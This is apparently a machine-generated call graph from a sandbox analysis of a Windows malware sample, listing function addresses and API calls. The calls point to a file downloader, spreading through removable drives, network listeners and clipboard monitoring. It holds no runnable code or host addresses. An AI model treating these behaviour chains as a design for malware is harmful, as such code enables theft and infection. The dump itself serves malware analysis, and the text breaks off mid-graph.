4907 409cf1 4906->4907 4908 409a50 62 API calls 4907->4908 4908->4903 4910 40989d 4909->4910 4911 4098a7 4909->4911 4910->4903 4910->4904 4910->4906 4911->4910 4912 409930 4911->4912 4914 409935 4911->4914 4915 409918 4911->4915 4920 4091f0 4912->4920 4916 409500 6 API calls 4914->4916 4918 409500 6 API calls 4915->4918 4916->4912 4918->4912 4919 4099dc memset 4919->4910 4921 409209 4920->4921 4929 4091ff 4920->4929 4922 4090c0 9 API calls 4921->4922 4921->4929 4923 409302 4922->4923 4924 40a530 _invalid_parameter 7 API calls 4923->4924 4925 409351 4924->4925 4926 408f30 46 API calls 4925->4926 4925->4929 4927 40937e 4926->4927 4928 40a740 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4927->4928 4928->4929 4929->4910 4929->4919 4949 40a3e0 GetCurrentProcessId 4930->4949 4932 40a57b 4933 40a400 _invalid_parameter 5 API calls 4932->4933 4938 40a587 _invalid_parameter 4932->4938 4933->4938 4934 405cb5 4934->4710 4934->4711 4935 40a680 _invalid_parameter HeapValidate 4935->4938 4936 40a630 HeapAlloc 4936->4938 4937 40a5fa HeapReAlloc 4937->4938 4938->4934 4938->4935 4938->4936 4938->4937 4939 40a740 _invalid_parameter 3 API calls 4938->4939 4939->4938 4943 40c72b 4940->4943 4941 40a530 _invalid_parameter 7 API calls 4941->4943 4942 405d4d 4942->4711 4944 4072a0 4942->4944 4943->4941 4943->4942 4945 40a530 _invalid_parameter 7 API calls 4944->4945 4946 4072b0 4945->4946 4947 4072f7 4946->4947 4948 4072bc memcpy CreateThread CloseHandle 4946->4948 4947->4711 4948->4947 4950 407300 4948->4950 4949->4932 4951 407371 4950->4951 4959 407311 4950->4959 4952 40737c DeleteUrlCacheEntry 4951->4952 4953 40736f 4951->4953 4954 40f070 64 API calls 4952->4954 4955 40a740 _invalid_parameter 3 API calls 4953->4955 4954->4953 4957 4073a6 4955->4957 4956 407320 StrChrA 4958 407344 DeleteUrlCacheEntry 4956->4958 4956->4959 4962 40f070 9 API calls 4958->4962 4959->4953 4959->4956 4959->4958 4963 40f133 InternetOpenUrlW 4962->4963 4964 40f29e InternetCloseHandle Sleep 4962->4964 4965 40f291 InternetCloseHandle 4963->4965 4966 40f162 CreateFileW 4963->4966 4967 40f2c5 7 API calls 4964->4967 4968 407359 Sleep 4964->4968 4965->4964 4970 40f191 InternetReadFile 4966->4970 4971 40f284 CloseHandle 4966->4971 4967->4968 4969 40f354 wsprintfW DeleteFileW Sleep 4967->4969 4968->4959 4972 40ed50 21 API calls 4969->4972 4973 40f1e4 CloseHandle wsprintfW DeleteFileW Sleep 4970->4973 4974 40f1b5 4970->4974 4971->4965 4976 40f394 4972->4976 4990 40ed50 CreateFileW 4973->4990 4974->4973 4975 40f1be WriteFile 4974->4975 4975->4970 4978 40f3d2 DeleteFileW 4976->4978 4979 40f39e Sleep 4976->4979 4978->4968 4981 40ef10 6 API calls 4979->4981 4984 40f3b5 4981->4984 4982 40f277 DeleteFileW 4982->4971 4983 40f23b Sleep 4985 40ef10 6 API calls 4983->4985 4984->4968 4986 40f3c8 ExitProcess 4984->4986 4987 40f252 4985->4987 4988 40f266 ExitProcess 4987->4988 4989 40f26e 4987->4989 4989->4971 4991 40ed95 CreateFileMappingW 4990->4991 4992 40eeaa 4990->4992 4993 40eea0 CloseHandle 4991->4993 4994 40edb6 MapViewOfFile 4991->4994 4995 40eeb0 CreateFileW 4992->4995 4996 40ef01 4992->4996 4993->4992 4997 40edd5 GetFileSize 4994->4997 4998 40ee96 CloseHandle 4994->4998 4999 40eed2 WriteFile CloseHandle 4995->4999 5000 40eef8 4995->5000 4996->4982 4996->4983 5001 40edf1 4997->5001 5002 40ee8c UnmapViewOfFile 4997->5002 4998->4993 4999->5000 5003 40a740 _invalid_parameter 3 API calls 5000->5003 5012 40cd80 5001->5012 5002->4998 5003->4996 5006 40c720 7 API calls 5007 40ee40 5006->5007 5007->5002 5008 40ee5d memcmp 5007->5008 5008->5002 5009 40ee79 5008->5009 5010 40a740 _invalid_parameter 3 API calls 5009->5010 5011 40ee82 5010->5011 5011->5002 5013 40c7b0 10 API calls 5012->5013 5014 40cda4 5013->5014 5014->5002 5014->5006 5016 40dccd htons inet_addr setsockopt 5015->5016 5022 40ddfe 5015->5022 5017 40b010 8 API calls 5016->5017 5018 40dd46 bind lstrlenA sendto ioctlsocket 5017->5018 5019 40dd9b 5018->5019 5023 40ddc2 5019->5023 5024 40a570 9 API calls 5019->5024 5063 40de20 5019->5063 5022->4492 5072 40b0d0 shutdown closesocket 5023->5072 5024->5019 5079 40e150 memset InternetCrackUrlA InternetOpenA 5025->5079 5028 40e02e 5028->4492 5030 40dffb 5031 40a740 _invalid_parameter 3 API calls 5030->5031 5031->5028 5037 40dff1 SysFreeString 5037->5030 5186 40afd0 inet_addr 5040->5186 5043 40b0bd 5048 40ea00 5043->5048 5044 40b06c connect 5045 40b080 getsockname 5044->5045 5046 40b0b4 5044->5046 5045->5046 5189 40b0d0 shutdown closesocket 5046->5189 5190 40afb0 inet_ntoa 5048->5190 5050 40ea16 5051 40cf80 11 API calls 5050->5051 5052 40ea35 5051->5052 5058 40dc5c 5052->5058 5191 40ea80 memset InternetCrackUrlA InternetOpenA 5052->5191 5055 40ea6c 5057 40a740 _invalid_parameter 3 API calls 5055->5057 5056 40a740 _invalid_parameter 3 API calls 5056->5055 5057->5058 5058->4501 5062 40a864 5059->5062 5060 40a86a 5060->4493 5061 40a740 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5061->5062 5062->5060 5062->5061 5064 40de3c 5063->5064 5065 40df04 5064->5065 5066 40de58 recvfrom 5064->5066 5065->5019 5067 40de86 StrCmpNIA 5066->5067 5068 40de79 Sleep 5066->5068 5067->5064 5069 40dea5 StrStrIA 5067->5069 5068->5064 5069->5064 5070 40dec6 StrChrA 5069->5070 5073 40ce30 5070->5073 5072->5022 5075 40ce3b 5073->5075 5074 40ce41 lstrlenA 5074->5075 5076 40ce54 5074->5076 5075->5074 5075->5076 5077 40a530 _invalid_parameter 7 API calls 5075->5077 5078 40ce70 memcpy 5075->5078 5076->5064 5077->5075 5078->5075 5078->5076 5080 40e1f1 InternetConnectA 5079->5080 5081 40df2a 5079->5081 5082 40e35a InternetCloseHandle 5080->5082 5083 40e22a HttpOpenRequestA 5080->5083 5081->5028 5092 40e040 5081->5092 5082->5081 5084 40e260 HttpSendRequestA 5083->5084 5085 40e34d InternetCloseHandle 5083->5085 5086 40e340 InternetCloseHandle 5084->5086 5089 40e27d 5084->5089 5085->5082 5086->5085 5087 40e2cb 5087->5086 5088 40e29e InternetReadFile 5088->5087 5088->5089 5089->5087 5089->5088 5090 40a570 9 API calls 5089->5090 5091 40e2e6 memcpy 5090->5091 5091->5089 5121 405630 5092->5121 5095 40e06a SysAllocString 5096 40e081 CoCreateInstance 5095->5096 5097 40e137 5095->5097 5099 40e12d SysFreeString 5096->5099 5101 40e0a6 5096->5101 5098 40a740 _invalid_parameter 3 API calls 5097->5098 5100 40df43 5098->5100 5099->5097 5100->5030 5102 40e9b0 5100->5102 5101->5099 5138 40e500 5102->5138 5105 40e380 5143 40e7d0 5105->5143 5110 40e930 6 API calls 5111 40e3d7 5110->5111 5117 40dfc2 5111->5117 5160 40e5f0 5111->5160 5114 40e40f 5114->5117 5165 40e4a0 5114->5165 5115 40e5f0 6 API calls 5115->5114 5117->5037 5118 40cf80 5117->5118 5181 40cef0 5118->5181 5122 40563d 5121->5122 5123 405643 lstrlenA 5122->5123 5125 40a530 _invalid_parameter 7 API calls 5122->5125 5127 405656 5122->5127 5128 40a740 _invalid_parameter 3 API calls 5122->5128 5129 4055d0 5122->5129 5133 405580 5122->5133 5123->5122 5123->5127 5125->5122 5127->5095 5127->5100 5128->5122 5130 4055e7 MultiByteToWideChar 5129->5130 5131 4055da lstrlenA 5129->5131 5132 40560c 5130->5132 5131->5130 5132->5122 5134 40558b 5133->5134 5135 405591 lstrlenA 5134->5135 5136 4055d0 2 API calls 5134->5136 5137 4055c7 5134->5137 5135->5134 5136->5134 5137->5122 5141 40e526 5138->5141 5139 40dfad 5139->5030 5139->5105 5140 40e5a3 lstrcmpiW 5140->5141 5142 40e5bb SysFreeString 5140->5142 5141->5139 5141->5140 5141->5142 5142->5141 5144 40e7f6 5143->5144 5145 40e39b 5144->5145 5146 40e883 lstrcmpiW 5144->5146 5145->5117 5155 40e930 5145->5155 5147 40e903 SysFreeString 5146->5147 5148 40e896 5146->5148 5147->5145 5149 40e4a0 2 API calls 5148->5149 5151 40e8a4 5149->5151 5150 40e8f5 5150->5147 5151->5147 5151->5150 5152 40e8d3 lstrcmpiW 5151->5152 5153 40e8e5 5152->5153 5154 40e8eb SysFreeString 5152->5154 5153->5154 5154->5150 5156 40e4a0 2 API calls 5155->5156 5158 40e94b 5156->5158 5157 40e3b9 5157->5110 5157->5117 5158->5157 5159 40e7d0 6 API calls 5158->5159 5159->5157 5161 40e4a0 2 API calls 5160->5161 5163 40e60b 5161->5163 5162 40e3f5 5162->5114 5162->5115 5163->5162 5169 40e670 5163->5169 5166 40e4c6 5165->5166 5167 40e4dd 5166->5167 5168 40e500 2 API calls 5166->5168 5167->5117 5168->5167 5170 40e696 5169->5170 5171 40e7ad 5170->5171 5172 40e723 lstrcmpiW 5170->5172 5171->5162 5173 40e7a3 SysFreeString 5172->5173 5174 40e736 5172->5174 5173->5171 5175 40e4a0 2 API calls 5174->5175 5177 40e744 5175->5177 5176 40e795 5176->5173 5177->5173 5177->5176 5178 40e773 lstrcmpiW 5177->5178 5179 40e785 5178->5179 5180 40e78b SysFreeString 5178->5180 5179->5180 5180->5176 5185 40cefd 5181->5185 5182 40cea0 _vscprintf wvsprintfA 5182->5185 5183 40cf18 SysFreeString 5183->5037 5184 40a570 9 API calls 5184->5185 5185->5182 5185->5183 5185->5184 5187 40affc socket 5186->5187 5188 40afe9 gethostbyname 5186->5188 5187->5043 5187->5044 5188->5187 5189->5043 5190->5050 5192 40ea57 5191->5192 5193 40eb24 InternetConnectA 5191->5193 5192->5055 5192->5056 5194 40eca4 InternetCloseHandle 5193->5194 5195 40eb5d HttpOpenRequestA 5193->5195 5194->5192 5196 40eb93 HttpAddRequestHeadersA HttpSendRequestA 5195->5196 5197 40ec97 InternetCloseHandle 5195->5197 5198 40ec8a InternetCloseHandle 5196->5198 5201 40ebdd 5196->5201 5197->5194 5198->5197 5199 40ebf4 InternetReadFile 5200 40ec21 5199->5200 5199->5201 5200->5198 5201->5199 5201->5200 5202 40a570 9 API calls 5201->5202 5203 40ec3c memcpy 5202->5203 5203->5201 5209 406ff7 5204->5209 5205 4071cb 5207 4071d4 SysFreeString 5205->5207 5208 406f9b SysFreeString 5205->5208 5206 40a740 _invalid_parameter 3 API calls 5206->5205 5207->5208 5208->4505 5210 407250 CoCreateInstance 5209->5210 5211 407146 SysAllocString 5209->5211 5212 407012 5209->5212 5210->5209 5211->5209 5211->5212 5212->5205 5212->5206 5214 40c45a 5213->5214 5215 40c45e 5213->5215 5214->4511 5217 40c410 CryptAcquireContextW 5215->5217 5218 40c44b 5217->5218 5219 40c42d CryptGenRandom CryptReleaseContext 5217->5219 5218->5214 5219->5218 5220->4535 5272 40b360 gethostname 5221->5272 5224 40b449 5224->4535 5226 40b45c strcmp 5226->5224 5227 40b471 5226->5227 5276 40afb0 inet_ntoa 5227->5276 5229 40b47f strstr 5230 40b4d0 5229->5230 5231 40b48f 5229->5231 5279 40afb0 inet_ntoa 5230->5279 5277 40afb0 inet_ntoa 5231->5277 5234 40b49d strstr 5234->5224 5238 40b4ad 5234->5238 5235 40b4de strstr 5236 40b4ee 5235->5236 5237 40b52f 5235->5237 5280 40afb0 inet_ntoa 5236->5280 5282 40afb0 inet_ntoa 5237->5282 5278 40afb0 inet_ntoa 5238->5278 5242 40b4fc strstr 5242->5224 5245 40b50c 5242->5245 5243 40b53d strstr 5246 40b54d 5243->5246 5247 40b58e EnterCriticalSection 5243->5247 5244 40b4bb strstr 5244->5224 5244->5230 5281 40afb0 inet_ntoa 5245->5281 5283 40afb0 inet_ntoa 5246->5283 5248 40b5a6 5247->5248 5257 40b5d1 5248->5257 5285 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5248->5285 5251 40b51a strstr 5251->5224 5251->5237 5252 40b55b strstr 5252->5224 5253 40b56b 5252->5253 5284 40afb0 inet_ntoa 5253->5284 5256 40b6ca LeaveCriticalSection 5256->5224 5257->5256 5259 40a320 7 API calls 5257->5259 5258 40b579 strstr 5258->5224 5258->5247 5260 40b615 5259->5260 5260->5256 5286 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5260->5286 5262 40b633 5263 40b660 5262->5263 5264 40b656 Sleep 5262->5264 5266 40b685 5262->5266 5265 40a740 _invalid_parameter 3 API calls 5263->5265 5264->5262 5265->5266 5266->5256 5287 40b110 5266->5287 5268->4539 5270 40b110 14 API calls 5269->5270 5271 40b103 LeaveCriticalSection 5270->5271 5271->4531 5273 40b387 gethostbyname 5272->5273 5274 40b3a3 5272->5274 5273->5274 5274->5224 5275 40afb0 inet_ntoa 5274->5275 5275->5226 5276->5229 5277->5234 5278->5244 5279->5235 5280->5242 5281->5251 5282->5243 5283->5252 5284->5258 5285->5257 5286->5262 5288 40b124 5287->5288 5295 40b11f 5287->5295 5289 40a530 _invalid_parameter 7 API calls 5288->5289 5290 40b138 5289->5290 5291 40b194 CreateFileW 5290->5291 5290->5295 5292 40b1e3 InterlockedExchange 5291->5292 5293 40b1b7 WriteFile FlushFileBuffers CloseHandle 5291->5293 5294 40a740 _invalid_parameter 3 API calls 5292->5294 5293->5292 5294->5295 5295->5256 5297 40d7ed 5296->5297 5298 40d723 5297->5298 5299 40d811 WaitForSingleObject 5297->5299 5298->4546 5298->4547 5299->5297 5300 40d82c CloseHandle 5299->5300 5300->5297 5306 407407 5301->5306 5302 4074e1 Sleep 5302->5306 5303 40742f Sleep 5303->5306 5304 40745e Sleep wsprintfA DeleteUrlCacheEntry 5331 40efc0 InternetOpenA 5304->5331 5306->5302 5306->5303 5306->5304 5307 40f070 64 API calls 5306->5307 5307->5306 5309 405829 memset GetModuleHandleW 5308->5309 5310 405862 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5309->5310 5310->5310 5311 4058a0 CreateWindowExW 5310->5311 5312 4058cb 5311->5312 5313 4058cd GetMessageA 5311->5313 5314 4058ff ExitThread 5312->5314 5315 4058e1 TranslateMessage DispatchMessageA 5313->5315 5316 4058f7 5313->5316 5315->5313 5316->5309 5316->5314 5338 40ed00 CreateFileW 5317->5338 5319 406b80 5320 406cd8 ExitThread 5319->5320 5322 406cc8 Sleep 5319->5322 5323 406bb9 5319->5323 5341 406340 GetLogicalDrives 5319->5341 5322->5319 5347 406260 5323->5347 5326 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5327 406c66 wsprintfW 5326->5327 5328 406c7b wsprintfW 5326->5328 5327->5328 5353 406650 _chkstk 5328->5353 5329 406beb 5332 40efe6 InternetOpenUrlA 5331->5332 5333 40f058 Sleep 5331->5333 5334 40f005 HttpQueryInfoA 5332->5334 5335 40f04e InternetCloseHandle 5332->5335 5333->5306 5336 40f044 InternetCloseHandle 5334->5336 5337 40f02e 5334->5337 5335->5333 5336->5335 5337->5336 5339 40ed48 5338->5339 5340 40ed2f GetFileSize CloseHandle 5338->5340 5339->5319 5340->5339 5344 40636d 5341->5344 5342 4063e6 5342->5319 5343 40637c RegOpenKeyExW 5343->5344 5345 40639e RegQueryValueExW 5343->5345 5344->5342 5344->5343 5346 4063da RegCloseKey 5344->5346 5345->5344 5345->5346 5346->5344 5348 4062b9 5347->5348 5349 40627c 5347->5349 5348->5326 5348->5329 5388 4062c0 GetDriveTypeW 5349->5388 5352 4062ab lstrcpyW 5352->5348 5354 406667 5353->5354 5355 40666e 6 API calls 5353->5355 5354->5329 5356 406722 5355->5356 5357 406764 PathFileExistsW 5355->5357 5358 40ed00 3 API calls 5356->5358 5359 406803 PathFileExistsW 5357->5359 5360 406779 SetFileAttributesW DeleteFileW PathFileExistsW 5357->5360 5365 40672e 5358->5365 5363 406814 5359->5363 5364 406859 FindFirstFileW 5359->5364 5361 4067a9 CreateDirectoryW 5360->5361 5362 4067cb PathFileExistsW 5360->5362 5361->5362 5366 4067bc SetFileAttributesW 5361->5366 5362->5359 5367 4067dc CopyFileW 5362->5367 5368 406834 5363->5368 5369 40681c 5363->5369 5364->5354 5386 406880 5364->5386 5365->5357 5370 406745 SetFileAttributesW DeleteFileW 5365->5370 5366->5362 5367->5359 5372 4067f4 SetFileAttributesW 5367->5372 5374 406400 3 API calls 5368->5374 5393 406400 CoInitialize CoCreateInstance 5369->5393 5370->5357 5371 406942 lstrcmpW 5375 406958 lstrcmpW 5371->5375 5371->5386 5372->5359 5376 40682f SetFileAttributesW 5374->5376 5375->5386 5376->5364 5377 406b19 FindNextFileW 5377->5371 5379 406b35 FindClose 5377->5379 5379->5354 5380 40699e lstrcmpiW 5380->5386 5381 406a05 PathMatchSpecW 5383 406a26 wsprintfW SetFileAttributesW DeleteFileW 5381->5383 5381->5386 5382 406a83 PathFileExistsW 5384 406a99 wsprintfW wsprintfW 5382->5384 5382->5386 5383->5386 5385 406b03 MoveFileExW 5384->5385 5384->5386 5385->5377 5386->5371 5386->5377 5386->5380 5386->5381 5386->5382 5397 406510 CreateDirectoryW wsprintfW FindFirstFileW 5386->5397 5389 40629f 5388->5389 5390 4062e8 5388->5390 5389->5348 5389->5352 5390->5389 5391 4062fc QueryDosDeviceW 5390->5391 5391->5389 5392 406316 StrCmpNW 5391->5392 5392->5389 5394 406436 5393->5394 5396 406472 5393->5396 5395 406440 wsprintfW 5394->5395 5394->5396 5395->5396 5396->5376 5398 406565 lstrcmpW 5397->5398 5399 40663f 5397->5399 5400 40657b lstrcmpW 5398->5400 5404 406591 5398->5404 5399->5386 5401 406593 wsprintfW wsprintfW 5400->5401 5400->5404 5403 4065f6 MoveFileExW 5401->5403 5401->5404 5402 40660c FindNextFileW 5402->5398 5405 406628 FindClose RemoveDirectoryW 5402->5405 5403->5402 5404->5402 5405->5399 5406 40d440 5411 40d444 5406->5411 5408 40d460 WaitForSingleObject 5410 40d485 5408->5410 5408->5411 5411->5408 5411->5410 5412 40b790 EnterCriticalSection 5411->5412 5417 40d060 InterlockedExchangeAdd 5411->5417 5413 40b7c7 LeaveCriticalSection 5412->5413 5414 40b7af 5412->5414 5413->5411 5415 40c450 3 API calls 5414->5415 5416 40b7ba 5415->5416 5416->5413 5418 40d07d 5417->5418 5428 40d076 5417->5428 5434 40d350 5418->5434 5421 40d09d InterlockedIncrement 5431 40d0a7 5421->5431 5423 40d0d0 5444 40afb0 inet_ntoa 5423->5444 5425 40d0dc 5426 40d1a0 InterlockedDecrement 5425->5426 5459 40b0d0 shutdown closesocket 5426->5459 5428->5411 5429 40a530 _invalid_parameter 7 API calls 5429->5431 5430 40d280 6 API calls 5430->5431 5431->5423 5431->5426 5431->5429 5431->5430 5433 40a740 _invalid_parameter 3 API calls 5431->5433 5441 40bab0 5431->5441 5445 40bb00 5431->5445 5433->5431 5435 40d35d socket 5434->5435 5436 40d372 htons connect 5435->5436 5437 40d3cf 5435->5437 5436->5437 5438 40d3ba 5436->5438 5437->5435 5439 40d08d 5437->5439 5460 40b0d0 shutdown closesocket 5438->5460 5439->5421 5439->5428 5461 40ba10 5441->5461 5444->5425 5455 40bb11 5445->5455 5447 40bb2f 5449 40a740 _invalid_parameter 3 API calls 5447->5449 5450 40bedf 5449->5450 5450->5431 5451 40bef0 21 API calls 5451->5455 5454 40bab0 13 API calls 5454->5455 5455->5447 5455->5451 5455->5454 5456 40b410 32 API calls 5455->5456 5469 40c040 5455->5469 5476 40b7e0 EnterCriticalSection 5455->5476 5481 406e20 5455->5481 5486 406ec0 5455->5486 5491 406cf0 5455->5491 5498 406df0 5455->5498 5456->5455 5459->5428 5460->5439 5462 40c490 3 API calls 5461->5462 5463 40ba1b 5462->5463 5464 40ba37 lstrlenA 5463->5464 5465 40c720 7 API calls 5464->5465 5466 40ba6d 5465->5466 5467 40ba98 5466->5467 5468 40a740 _invalid_parameter 3 API calls 5466->5468 5467->5431 5468->5467 5470 40c051 lstrlenA 5469->5470 5471 40c720 7 API calls 5470->5471 5475 40c06f 5471->5475 5472 40c07b 5473 40c0ff 5472->5473 5474 40a740 _invalid_parameter 3 API calls 5472->5474 5473->5455 5474->5473 5475->5470 5475->5472 5479 40b7f8 5476->5479 5477 40b834 LeaveCriticalSection 5477->5455 5479->5477 5501 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5479->5501 5480 40b823 5480->5477 5502 406e60 5481->5502 5484 406e59 5484->5455 5485 40d6f0 17 API calls 5485->5484 5487 406e60 75 API calls 5486->5487 5488 406edf 5487->5488 5489 406f0c 5488->5489 5517 406f20 5488->5517 5489->5455 5520 405f40 EnterCriticalSection 5491->5520 5493 406d0a 5494 406d3d 5493->5494 5525 406d50 5493->5525 5494->5455 5497 40a740 _invalid_parameter 3 API calls 5497->5494 5532 406000 EnterCriticalSection 5498->5532 5500 406e12 5500->5455 5501->5480 5505 406e73 5502->5505 5503 406e34 5503->5484 5503->5485 5505->5503 5506 405e50 EnterCriticalSection 5505->5506 5507 40cdb0 71 API calls 5506->5507 5508 405e6e 5507->5508 5509 405f2b LeaveCriticalSection 5508->5509 5510 405e87 5508->5510 5513 405ea8 5508->5513 5509->5505 5511 405e91 memcpy 5510->5511 5512 405ea6 5510->5512 5511->5512 5514 40a740 _invalid_parameter 3 API calls 5512->5514 5513->5512 5516 405f06 memcpy 5513->5516 5515 405f28 5514->5515 5515->5509 5516->5512 5518 40ba10 13 API calls 5517->5518 5519 406f65 5518->5519 5519->5489 5521 405f5e 5520->5521 5522 405fea LeaveCriticalSection 5521->5522 5523 40a7b0 8 API calls 5521->5523 5522->5493 5524 405fbc 5523->5524 5524->5522 5526 40a530 _invalid_parameter 7 API calls 5525->5526 5527 406d62 memcpy 5526->5527 5528 40ba10 13 API calls 5527->5528 5529 406dcc 5528->5529 5530 40a740 _invalid_parameter 3 API calls 5529->5530 5531 406d31 5530->5531 5531->5497 5557 40ce10 5532->5557 5535 406243 LeaveCriticalSection 5535->5500 5536 40cdb0 71 API calls 5537 406039 5536->5537 5537->5535 5538 406094 memcpy 5537->5538 5556 406158 5537->5556 5541 40a740 _invalid_parameter 3 API calls 5538->5541 5539 405c90 75 API calls 5542 406181 5539->5542 5540 40a740 _invalid_parameter 3 API calls 5543 4061a2 5540->5543 5544 4060b8 5541->5544 5542->5540 5543->5535 5545 4061b1 CreateFileW 5543->5545 5546 40a7b0 8 API calls 5544->5546 5545->5535 5547 4061d4 5545->5547 5548 4060c8 5546->5548 5551 4061f1 WriteFile 5547->5551 5552 40622f FlushFileBuffers CloseHandle 5547->5552 5549 40a740 _invalid_parameter 3 API calls 5548->5549 5550 4060ef 5549->5550 5553 40c720 7 API calls 5550->5553 5551->5547 5552->5535 5554 406125 5553->5554 5555 4072a0 71 API calls 5554->5555 5555->5556 5556->5539 5556->5542 5560 40c360 5557->5560 5564 40c371 5560->5564 5561 40a7b0 8 API calls 5561->5564 5562 40c38b 5565 40a740 _invalid_parameter 3 API calls 5562->5565 5563 40c2c0 70 API calls 5563->5564 5564->5561 5564->5562 5564->5563 5567 408080 68 API calls 5564->5567 5568 40c3cb memcmp 5564->5568 5566 406022 5565->5566 5566->5535 5566->5536 5567->5564 5568->5562 5568->5564 5569 40d1c0 5574 40d220 5569->5574 5572 40d1ee 5573 40d220 send 5573->5572 5575 40d231 send 5574->5575 5576 40d1d3 5575->5576 5577 40d24e 5575->5577 5576->5572 5576->5573 5577->5575 5577->5576 5797 40db80 5803 401470 5797->5803 5799 40db94 5800 40dba5 WaitForSingleObject 5799->5800 5802 40dbbf 5799->5802 5801 401330 8 API calls 5800->5801 5801->5802 5804 401483 5803->5804 5805 401572 5803->5805 5804->5805 5806 40a320 7 API calls 5804->5806 5805->5799 5807 401498 CreateEventA socket 5806->5807 5808 4014d5 5807->5808 5809 4014cf 5807->5809 5808->5805 5811 4014e2 htons setsockopt bind 5808->5811 5810 401330 8 API calls 5809->5810 5810->5808 5812 401546 5811->5812 5813 401558 CreateThread 5811->5813 5814 401330 8 API calls 5812->5814 5813->5805 5816 401100 20 API calls _invalid_parameter 5813->5816 5815 40154c 5814->5815 5815->5799 5578 4069c8 5585 40696e 5578->5585 5579 40699e lstrcmpiW 5579->5585 5580 406b19 FindNextFileW 5581 406942 lstrcmpW 5580->5581 5582 406b35 FindClose 5580->5582 5584 406958 lstrcmpW 5581->5584 5581->5585 5587 406b42 5582->5587 5583 406a05 PathMatchSpecW 5583->5585 5588 406a26 wsprintfW SetFileAttributesW DeleteFileW 5583->5588 5584->5585 5585->5579 5585->5580 5585->5583 5586 406a83 PathFileExistsW 5585->5586 5591 406510 11 API calls 5585->5591 5586->5585 5589 406a99 wsprintfW wsprintfW 5586->5589 5588->5585 5589->5585 5590 406b03 MoveFileExW 5589->5590 5590->5580 5591->5585 5592 401f50 GetQueuedCompletionStatus 5593 401f92 5592->5593 5594 402008 5592->5594 5595 401f97 WSAGetOverlappedResult 5593->5595 5599 401d60 5593->5599 5595->5593 5596 401fb9 WSAGetLastError 5595->5596 5596->5593 5598 401fd3 GetQueuedCompletionStatus 5598->5593 5598->5594 5600 401ef2 InterlockedDecrement setsockopt closesocket 5599->5600 5601 401d74 5599->5601 5618 401e39 5600->5618 5601->5600 5602 401d7c 5601->5602 5619 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5602->5619 5604 401d81 InterlockedExchange 5605 401d98 5604->5605 5606 401e4e 5604->5606 5611 401da9 InterlockedDecrement 5605->5611 5612 401dbc InterlockedDecrement InterlockedExchangeAdd 5605->5612 5605->5618 5607 401e67 5606->5607 5608 401e57 InterlockedDecrement 5606->5608 5609 401e72 5607->5609 5610 401e87 InterlockedDecrement 5607->5610 5608->5598 5628 401ae0 WSASend 5609->5628 5614 401ee9 5610->5614 5611->5598 5615 401e2f 5612->5615 5614->5598 5620 401cf0 5615->5620 5616 401e7e 5616->5598 5618->5598 5619->5604 5621 401d00 InterlockedExchangeAdd 5620->5621 5622 401cfc 5620->5622 5623 401d53 5621->5623 5624 401d17 InterlockedIncrement 5621->5624 5622->5618 5623->5618 5634 401c50 WSARecv 5624->5634 5626 401d46 5626->5623 5627 401d4c InterlockedDecrement 5626->5627 5627->5623 5629 401b50 5628->5629 5630 401b12 WSAGetLastError 5628->5630 5629->5616 5630->5629 5631 401b1f 5630->5631 5632 401b56 5631->5632 5633 401b26 Sleep WSASend 5631->5633 5632->5616 5633->5629 5633->5630 5635 401cd2 5634->5635 5636 401c8e 5634->5636 5635->5626 5637 401c90 WSAGetLastError 5636->5637 5638 401ca4 Sleep WSARecv 5636->5638 5639 401cdb 5636->5639 5637->5635 5637->5636 5638->5635 5638->5637 5639->5626 5817 40d490 5823 4021b0 5817->5823 5820 40d4cf 5821 40d4b5 WaitForSingleObject 5827 401600 5821->5827 5824 4021bb 5823->5824 5826 4021cf 5823->5826 5824->5826 5848 402020 5824->5848 5826->5820 5826->5821 5828 401737 5827->5828 5829 40160d 5827->5829 5828->5820 5829->5828 5830 401619 EnterCriticalSection 5829->5830 5831 4016b5 LeaveCriticalSection SetEvent 5830->5831 5836 401630 5830->5836 5832 4016d0 5831->5832 5833 4016e8 5831->5833 5834 4016d6 PostQueuedCompletionStatus 5832->5834 5835 40d860 11 API calls 5833->5835 5834->5833 5834->5834 5838 4016f3 5835->5838 5836->5831 5837 401641 InterlockedDecrement 5836->5837 5839 40165a InterlockedExchangeAdd 5836->5839 5846 4016a0 InterlockedDecrement 5836->5846 5837->5836 5840 40d9a0 7 API calls 5838->5840 5839->5836 5841 40166d InterlockedIncrement 5839->5841 5842 4016fc CloseHandle CloseHandle WSACloseEvent 5840->5842 5843 401c50 4 API calls 5841->5843 5869 40b0d0 shutdown closesocket 5842->5869 5843->5836 5845 401724 DeleteCriticalSection 5847 40a740 _invalid_parameter 3 API calls 5845->5847 5846->5836 5847->5828 5849 40a320 7 API calls 5848->5849 5850 40202b 5849->5850 5851 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5850->5851 5857 4021a5 5850->5857 5852 402076 CreateIoCompletionPort 5851->5852 5853 40219f 5851->5853 5852->5853 5854 40208f 5852->5854 5855 401600 36 API calls 5853->5855 5856 40d6c0 8 API calls 5854->5856 5855->5857 5858 402094 5856->5858 5857->5826 5858->5853 5859 40209f WSASocketA 5858->5859 5859->5853 5860 4020bd setsockopt htons bind 5859->5860 5860->5853 5861 402126 listen 5860->5861 5861->5853 5862 40213a WSACreateEvent 5861->5862 5862->5853 5863 402147 WSAEventSelect 5862->5863 5863->5853 5867 402159 5863->5867 5864 40217f 5865 40d6f0 17 API calls 5864->5865 5868 402194 5865->5868 5866 40d6f0 17 API calls 5866->5867 5867->5864 5867->5866 5868->5826 5869->5845 5870 405910 GetWindowLongW 5871 405934 5870->5871 5872 405956 5870->5872 5873 405941 5871->5873 5874 4059c7 IsClipboardFormatAvailable 5871->5874 5875 405951 5872->5875 5877 4059a6 5872->5877 5878 40598e SetWindowLongW 5872->5878 5881 405964 SetClipboardViewer SetWindowLongW 5873->5881 5882 405947 5873->5882 5879 4059e3 IsClipboardFormatAvailable 5874->5879 5880 4059da 5874->5880 5876 405b44 DefWindowProcA 5875->5876 5877->5875 5883 4059ac SendMessageA 5877->5883 5878->5875 5879->5880 5884 4059f8 IsClipboardFormatAvailable 5879->5884 5886 405a15 OpenClipboard 5880->5886 5887 405adc 5880->5887 5881->5876 5882->5875 5885 405afd RegisterRawInputDevices 